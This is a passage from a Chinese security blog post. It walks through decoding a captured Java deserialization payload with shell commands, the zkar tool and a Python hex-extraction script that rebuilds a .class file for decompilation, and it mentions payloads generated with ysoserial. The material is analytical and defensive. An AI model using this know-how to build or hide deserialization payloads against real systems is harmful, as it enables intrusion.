<span class=hljs-comment># 计算需要补充的等号数量</span>
|
|||
|
|
remainder=$((length % <span class=hljs-number>4</span>))
|
|||
|
|
padding=$(((<span class=hljs-number>4</span> - remainder) % <span class=hljs-number>4</span>))
|
|||
|
|
|
|||
|
|
<span class=hljs-comment># 补充等号</span>
|
|||
|
|
<span class=hljs-keyword>if</span> ((padding &gt; 0)); <span class=hljs-keyword>then</span>
|
|||
|
|
padding_string=$(<span class=hljs-built_in>printf</span> <span class=hljs-string>'=%.0s'</span> $(seq 1 <span class=hljs-variable>$padding</span>))
|
|||
|
|
base64_string=<span class=hljs-string>"$base64_string<span class=hljs-variable>$padding_string</span>"</span>
|
|||
|
|
<span class=hljs-keyword>fi</span>
|
|||
|
|
|
|||
|
|
<span class=hljs-built_in>echo</span> <span class=hljs-string>"<span class=hljs-variable>$base64_string</span>"</span>
|
|||
|
|
</code></pre>
|
|||
|
|
<p blockindex=51>然后处理base64和开头的<code>00</code>的问题</p>
|
|||
|
|
<pre blockindex=52><code class="hljs language-bash">cat target_base64.bin | base64 -d > target_00.bin
|
|||
|
|
tail -c +2 target_00.bin > restore.bin
|
|||
|
|
</code></pre>
|
|||
|
|
<p blockindex=53>然后就是用zkar解析一波</p>
|
|||
|
|
<pre blockindex=54><code class="hljs language-bash">./zkar dump -f restore.bin > restore.txt
|
|||
|
|
</code></pre>
|
|||
|
|
<p blockindex=55>将中间反序列化部分(即 zkar 输出里以<code>ca fe</code>开头的那段十六进制)抠出来,保存成ser_hex.txt</p>
|
|||
|
|
<p blockindex=56><img src="data:image/png;base64,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
|
|||
|
|
<p blockindex=57><img src=data:image/png;base64,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
|
|||
|
|
<p blockindex=58>然后执行下面的脚本保存成class文件:</p>
|
|||
|
|
<pre blockindex=59><code class="hljs language-bash">import re
|
|||
|
|
import sys
|
|||
|
|
|
|||
|
|
def remove_hex_line(input_string):
|
|||
|
|
pattern = re.compile(r<span class=hljs-string>'[0-9a-fA-F]{8}'</span>)
|
|||
|
|
<span class=hljs-built_in>return</span> re.sub(pattern, <span class=hljs-string>''</span>, input_string)
|
|||
|
|
|
|||
|
|
def remove_vertical_line(input_string):
|
|||
|
|
pattern = re.compile(r<span class=hljs-string>'\|.*\|'</span>)
|
|||
|
|
<span class=hljs-built_in>return</span> re.sub(pattern, <span class=hljs-string>''</span>, input_string)
|
|||
|
|
|
|||
|
|
def extract_hex_to_file(input_filename, output_filename):
|
|||
|
|
with open(input_filename, <span class=hljs-string>"r"</span>) as file:
|
|||
|
|
input_text = file.read()
|
|||
|
|
|
|||
|
|
input_text = remove_hex_line(input_text)
|
|||
|
|
input_text = remove_vertical_line(input_text)
|
|||
|
|
hex_data = re.findall(r<span class=hljs-string>"[0-9a-fA-F]{2}(?: [0-9a-fA-F]{2})*"</span>, input_text)
|
|||
|
|
hex_string = <span class=hljs-string>""</span>.join(hex_data).replace(<span class=hljs-string>" "</span>, <span class=hljs-string>""</span>)
|
|||
|
|
|
|||
|
|
with open(output_filename, <span class=hljs-string>"wb"</span>) as file:
|
|||
|
|
file.write(bytes.fromhex(hex_string))
|
|||
|
|
|
|||
|
|
<span class=hljs-keyword>if</span> __name__ == <span class=hljs-string>"__main__"</span>:
|
|||
|
|
<span class=hljs-keyword>if</span> len(sys.argv) != 3:
|
|||
|
|
<span class=hljs-built_in>print</span>(<span class=hljs-string>"Usage: python3 extract_hex.py input_filename output_filename"</span>)
|
|||
|
|
sys.exit(1)
|
|||
|
|
|
|||
|
|
input_filename = sys.argv[1]
|
|||
|
|
output_filename = sys.argv[2]
|
|||
|
|
|
|||
|
|
extract_hex_to_file(input_filename, output_filename)
|
|||
|
|
</code></pre>
|
|||
|
|
<pre blockindex=60><code class="hljs language-bash">python3 extract_hex.py ser_hex.txt restore.class
|
|||
|
|
</code></pre>
|
|||
|
|
<p blockindex=61>拿到class,然后丢到idea中,自己反编译了</p>
|
|||
|
|
<p blockindex=62><img src="data:image/png;base64,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
|
|||
|
|
<h2 blockindex=63>0x05 后言</h2>
|
|||
|
|
<p blockindex=64>在分析的时候,发现 ysoserial 两次生成Payload会不一样的。。。卡了我好一会。。。</p>
|
|||
|
|
<p blockindex=65><img src=data:image/png;base64,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
|
|||
|
|
<p blockindex=66>虽然分析没问题,但是步骤略微繁琐,后续有空,可以考虑整合成一个工具,自动解码。</p>
|
|||
|
|
</div></div>
|
|||
|
|
</div>
|
|||
|
|
|
|||
|
|
</div>
|
|||
|
|
|
|||
|
|
</div>
|
|||
|
|
|
|||
|
|
|
|||
|
|
</div>
|
|||
|
|
|
|||
|
|
|
|||
|
|
</div>
|
|||
|
|
</div>
|
|||
|
|
</div>
|
|||
|
|